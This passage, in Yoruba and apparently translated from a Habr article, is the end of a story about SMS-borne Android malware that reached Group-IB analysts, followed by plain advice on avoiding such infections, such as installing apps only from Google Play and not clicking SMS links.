O da, eniyan ti o gba ifiranṣẹ SMS ti a ṣalaye ni ibẹrẹ nkan naa yipada lati jẹ alamọja cybersecurity. Nitorinaa, gidi, ẹya ti kii ṣe oludari yatọ si eyiti a sọ tẹlẹ: eniyan kan gba SMS ti o nifẹ, lẹhin eyi o fun ni ẹgbẹ Ẹgbẹ-IB Irokeke Sode Intelligence. Abajade ikọlu ni nkan yii. Ipari idunnu, otun? Bibẹẹkọ, kii ṣe gbogbo awọn itan pari ni aṣeyọri, ati pe ki tirẹ ko dabi gige ti oludari pẹlu isonu ti owo, ni ọpọlọpọ awọn ọran o to lati faramọ awọn ofin ti a ṣalaye gigun wọnyi:
- maṣe fi awọn ohun elo sori ẹrọ fun ẹrọ alagbeka pẹlu Android OS lati eyikeyi awọn orisun miiran yatọ si Google Play
- Nigbati o ba nfi ohun elo kan sori ẹrọ, san ifojusi pataki si awọn ẹtọ ti ohun elo naa beere
- san ifojusi si awọn amugbooro ti awọn faili ti a gbasile
- fi sori ẹrọ awọn imudojuiwọn Android OS nigbagbogbo
- maṣe ṣabẹwo si awọn orisun ifura ati ma ṣe ṣe igbasilẹ awọn faili lati ibẹ
- Maṣe tẹ awọn ọna asopọ ti o gba ni awọn ifiranṣẹ SMS.
orisun: www.habr.com